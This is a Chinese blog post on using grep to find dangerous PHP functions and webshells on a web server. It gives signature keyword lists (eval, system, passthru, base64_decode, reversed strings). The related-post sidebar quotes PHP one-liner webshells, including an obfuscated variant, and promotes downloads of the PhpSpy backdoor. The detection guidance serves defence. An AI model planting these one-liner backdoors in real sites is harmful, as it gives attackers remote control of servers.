利用grep查找webshell

最新推荐文章于 2023-08-15 13:12:51 发布
最新推荐文章于 2023-08-15 13:12:51 发布
阅读量1.4k 收藏
点赞数
分类专栏: web安全 文章标签: webshell

原文地址:http://www.freebuf.com/articles/4074.html

grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。Unix的grep家族包括grep、egrep和fgrep。

利用grep命令我们可以查找常见的漏洞、webshell和其他恶意文件。本文使用的grep版本为2.9,如果你使用一个低于2.5.4的grep,那本片文章中的一些命令可能无法正常工作。可以用grep -v或grep -version确定一下版本。你也可以使用grep –help查看更多信息。如下图:

发现漏洞的常见方法:

为什么大多数web应用程序都会发现一些不安全的代码,就是因为调用了一些不安全的函数,而又未进行过滤。例如:命令注入或远程代码执行,可以执行客户端传递的参数。这里常常会用到shell_exec函数。我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:

grep -Rn shell_exec *(  /var/www

上图中,我们可以看到可能存在漏洞的函数行和路径。

另一个例子:include require include_once和require_once都是可能存在问题的地方,它可能会造成本地文件包含漏洞。我们可以使用grep查找出现该函数的地方然后进行测试判断,如下:

grep -Rn include *(” /var/www
grep -Rn require *(” /var/www
grep -Rn include_once *(” /var/www
grep -Rn require_once *(” /var/www

以上两个简单的例子可以做为白盒挖掘漏洞的参考,下面介绍一下查找webshell和其他恶意文件的方法:

常见的webshell都会包含一些功能,如执行命令、下载文件、编辑文件、反弹连接等行为。除了常见的shell_exec,base64_decode和eval,还有其他的一些特征码,比如phpspy2006中会包含“Version:2006,proxycontents”,phpspy2008中会包含“phpspypass,goaction(‘backconnect”等等。还有以下一些常见的特征:

phpinfo
system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

我们可以用grep搜索包含这些函数的文件,如下:

grep -Rn shell_exec *(” /var/www
grep -Rn base64_decode *(” /var/www
grep -Rn phpinfo *(” /var/www
grep -Rn system *(” /var/www
grep -Rn php_uname *(” /var/www
grep -Rn chmod *(” /var/www
grep -Rn fopen *(” /var/www
grep -Rn fclose *(” /var/www
grep -Rn readfile *(” /var/www
grep -Rn edoced_46esab *(” /var/www
grep -Rn eval *(” /var/www
grep -Rn passthru *(” /var/www

当然这些可以合并成一条命令,如下:

grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\( /var/www
geeyeek
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[文件数据]PhpSpy 2006 修改版_phpspy_2006.rar
04-03
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
linux查找webshell
weixin_33962923的博客
03-24 201
公司网站被挂马,如何快速的查找出来通过grep 查找webshell我们可以用grep命令搜索文件存在shell_exec函数的地方,如下:grep -Rn“shell_exec *(”/var/www查找其它危险函数grep -Rn“shell_exec *(” /var/wwwgrep -Rn“base64_decode *(” /var/wwwgrep -Rn “ph...
Webshell_box-黑吃黑
qq_39756628的博客
05-18 213
木马路径: E:\SCAN\PHP大马\新建文件夹\webshell-master\php\phpspy\phpspy_2006.php 环境: win2003克隆 :192.168.4.8 (箱子) win2008克隆: 192.168.4.4 (肉鸡) 木马添加木马: $url=$_SERVER['HTTP_HOST']. $_SERVER['PHP_SELF']; echo $url; 然后进行修改,指向信封 再次访问木马: 信封也会有记录 ...
php 运行客户提交代码(攻击)和运行图片的代码
weixin_30682127的博客
03-06 283
1、$a=@strrev(ecalper_gerp);$b=@strrev(edoced_46esab);@$a($b(L3h4L2Ug),$_POST[POST],bxxb); 2、<?phpeval($_POST[cmd])?> 3、运行图片的PHP代码,include 1.jpg; 转载于:https://www.cnblogs.com/hech...
php语句 绕过验证,由php字符offset特征造成的绕过漏洞详解
weixin_26870313的博客
03-10 188
php的字符offset特性php的字符串存在一个非常有趣的特性,php的字符串也可以像数组一样进行取值。$test = "hello world";echo $test[0];最后的结果就是h。但是上述的这种特性有时会有意想不到的效果,看下面这段代码$mystr = "hello world";echo $mystr["pass"];上述的代码的输出结果是h.这是为什么呢?其实很简单,和很...
shell grep 查找进程的小技巧
09-15
大部分人在写Shell 过滤进程的时候 都会使用 grep 在 ps aux 的输出结果查找指定的进程,但此时也会把 grep 进程也显示出来
自定义grep命令(递归查找)
08-15
这个代码是自定义的Linux下的grep命令实现文件内容的查找,并罗列行数。Linux系统grep命令是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹 配的行打印出来。grep全称是Global Regular Expression ...
Linux利用grep命令如何检索文件内容详解
01-10
下面来一起看看Linux利用grep命令检索文件内容的详细介绍。 方法如下: 1、搜索某个文件里面是否包含字符串 命令格式:grep “被查找的字符串” filename1 例如: grep 0101034175 /data/transaction.20170118.log ...
Linux- 系统随你玩之-grep查找文件内容-fyydlz.zip
12-30
此外,还可以利用管道符(`|`)将`grep`与其他命令结合,进行更复杂的操作。例如,先使用`ls`列出目录内容,然后用`grep`筛选出特定文件名: ```bash ls | grep "txt" ``` 在实际运维工作,`grep`常与其他命令如`...
shell统计当前文件夹下的文件个数、目录个数
热门推荐
11-16 1万+
shell统计当前文件夹下的文件个数、目录个数 ls -l |grep "^-"|wc -l //统计当前文件夹下文件个数 ls -l |grep "^d"|wc -l //统计当前文件夹下目录的个数 ls -lR|grep "^-"|wc -l //统计当前文件夹下文件个数,包括子文件夹里的 ls -lR|grep "^d"|wc -l //统计文件夹下目录的个数,包括子文件夹里的 命令拆解 grep "^-" //这里将长列表输出信息过滤一部分,只保留一般文件,如果只保留目录
PhpSpy 2006
03-26
    DNS/IIS管理组件  P42.4服务器3700送产权    北京联通  河北网通  辽宁联通  江苏电信  河南网通  上海电信   a虚拟主机0.5元/M 主机管理系统1500元/套  a傲盾DDOS防火墙最低只要1500       注意:推荐使用迅雷飞速下载! 若不能下载,请报告错误,谢谢! 下载解压缩软件: winrar       高速ASP空间,美国全能空间  韩国服务器出租  最赚钱的广告联盟  免费购买网游装备/QQ号   软件简介:          PhpSpy是一个用PHP语言编写的在线管理程序,同时集成很多和海阳顶端网所类似的功能,也可以说是一个WEB方式的****,PHP的同类程序有几个,但多多少少有些缺陷,我结合现有的攻击手法,本着实用、简洁、小巧的原则,开发了这个程序。每个程序都有各自的特点,我们敢说这个程序是目前为止,在实现最实用的功能的情况下,体积是最小的。  2006功能列表(基于2005)  用函数生成页面的表格,体积比不用函数生成的时候减少了7kb,比全功能海阳2006小39kb   去掉了SESSION认证,提高兼容性   增加在WIN服务器上执行命令/程序的操作   增加在WIN服务器上对注册表的操作   增加在线HTTP代理功能   增加直接下载MYSQL备份文件   增加文件名改名   增加了克隆时间和自定义文件时间   2005版登陆要点按钮,这个版本直接回车   删除了几个地方的垃圾多余代码,换更加简练的方式写   修改了他妈的多处细节,更加流氓化       
phpspy 2006 修改版
04-19
phpspy 2006 修改版,一直没找到。 传上来分享了 有需要的拿走 ,自己看了下没有一句话,有发现的可以提醒我
phpspy2010 绕过登陆漏洞解析
03-25
NULL 博文链接:https://wcf1987.iteye.com/blog/1180028
PhpSpy各个版本都有
10-31
PhpSpy是一个用PHP语言编写的在线管理程序,同时集成很多和海阳顶端网所类似的功能,也可以说是一个WEB方式的后门,结合现有的攻击手法,本着实用、简洁、小巧的原则,开发了这个程序。由于程序性质问题,公开提供下载的版本不会提供更多的操作。例如MSSQL连接、WIN主机反弹等。
搜索别人的webshell
08-19
搜索别人的webshell,你可以不劳而获了。多谢GOOGLE
应急响应-Webshell
weixin_45626840的博客
08-15 1565
shell的概念源于操作系统,就是一个解析字符串命令并执行的程序。为了动态执行某些功能,编程语言一般会提供一些函数,将用户输入的字符串解析为语言代码,或解析为操作系统命令。典型的PHP一句话木马php?通过网络IO(socket API),获得cmdeval()将cmd字符串当作操作系统命令执行。Webshell就是指JSP、ASP、PHP等编程语言(网页脚本)的程序,一般带有命令执行、文件操作等功能。通过Web服务器来通信和调用,并具有shell的功能,称为Webshell
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 9834
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程获取Webshell的基本思路,实战还需就地取材,灵活应对。
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1483
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
php防止挂马执行exec,防患于未然:如何防止论坛被挂马
weixin_31832681的博客
03-12 275
# ee /usr/local/Zend/etc/php.inictrl+y查找:disable_functions找到后在=后面添加exec,system,passthru,error_log,ini_alter,dl,openlog,syslog,readlink,symlink,link,leak,fsockopen,proc_open,popepassthru,chroot,scandir...
grep 查找文件夹命令
最新发布
05-22
grep是一种常用的Linux命令行工具,用于在文件或者文件查找指定文本字符串,并将包含该字符串的行打印出来。以下是grep的常用选项和用法: 用法: grep [选项]... PATTERN [FILE]... 在FILE或者标准输入查找PATTERN 常用选项: -i, --ignore-case 不区分大小写地查找 -w, --word-regexp 只匹配完整的单词 -n, --line-number 显示行号 -r, --recursive 递归地搜索子目录 -v, --invert-match 反向查找不匹配的行 -E, --extended-regexp 使用扩展正则表达式 -F, --fixed-strings 使用固定字符串作为PATTERN -h, --no-filename 不显示文件名 -H, --with-filename 显示文件名 -q, --quiet 不显示任何输出 示例: 1. 在文件夹/home/user/documents/查找包含"hello"的行并显示行号: grep -n "hello" /home/user/documents/ 2. 在所有.txt文件查找包含"world"的行并显示文件名: grep -H "world" *.txt 3. 在文件夹/home/user/递归查找所有文件包含"apple"的行并不显示文件名: grep -rnh "apple" /home/user/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值